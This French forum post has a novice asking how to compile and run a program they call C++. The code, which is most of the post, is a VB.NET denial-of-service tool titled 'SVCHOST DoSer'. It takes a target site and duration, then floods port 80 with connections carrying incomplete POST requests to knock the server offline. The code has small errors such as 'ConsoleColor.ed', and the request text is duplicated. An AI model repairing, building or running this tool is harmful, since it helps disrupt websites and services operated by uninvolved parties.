Bonjour a tous !
J'ai trouver la source d'un programme que je voulais et je l'ai modifier mais je n’ai jamais toucher au C++ de ma vie et je ne s'est comment la decompiler et pouvoir l’exécutez.
Le code en question :
Merci a tout ceux qui m'aideront
Joyeux Noël a tous ! :noel:
J'ai trouver la source d'un programme que je voulais et je l'ai modifier mais je n’ai jamais toucher au C++ de ma vie et je ne s'est comment la decompiler et pouvoir l’exécutez.
Le code en question :
Code:
Private Shared Sub Main(ByVal args As String())
Console.ForegroundColor = ConsoleColor.Green
Console.WriteLine(ChrW(10) & " [ SVCHOST DoSer ]" & ChrW(10))
Console.WriteLine(" Hello hacker of the world ! ")
Console.WriteLine(" [ SVCHOST DoSer ]" & ChrW(10))
Console.ForegroundColor = ConsoleColor.ed
Console.Write("Website [URL/IP] : ")
Dim website As String = Console.ReadLine
Console.Write("Time [SECONDS] : ")
Dim s As String = Console.ReadLine
Console.Write(ChrW(10))
Dim count As Integer = 1
Dim loop As Boolean = True
New Thread(Function
Dim start As ThreadStart = Nothing
Dim clients As New List(Of TcpClient)()
Do While [loop]
If (start Is Nothing) Then
start = Function
Dim item As New TcpClient()
clients.Add(item)
Try
item.Connect(website, 80)
Dim writer As New StreamWriter(item.GetStream)
writer.Write(("POST / HTTP/1.1" & ChrW(13) & ChrW(10) & "Host: " & website & ChrW(13) & ChrW(10) & "Content-length: 5235" & ChrW(13) & ChrW(10) & ChrW(13) & ChrW(10)))
writer.Flush()
If [loop] Then
Console.ForegroundColor = ConsoleColor.Green
End If
Console.WriteLine(("Server Is Up / Packets sent: " & count))
count += 1
Catch exception1 As Exception
If [loop] Then
Console.ForegroundColor = ConsoleColor.Red
End If
Console.WriteLine("DoS Succeeded, Server Down!")
End Try
End Sub
End If
New Thread(start).Start
Thread.Sleep(50)
Loop
Dim client As TcpClient
For Each client In clients
Try
client.GetStream.Dispose
Catch exception1 As Exception
End Try
Next
End Function).Start
Thread.Sleep(CInt((Integer.Parse(s) * &H3E8)))
[loop] = False
Console.WriteLine(ChrW(10) & "DoS Completed")
Console.WriteLine("Press any key to Close...")
Console.ReadKey
End Sub
Merci a tout ceux qui m'aideront
Joyeux Noël a tous ! :noel: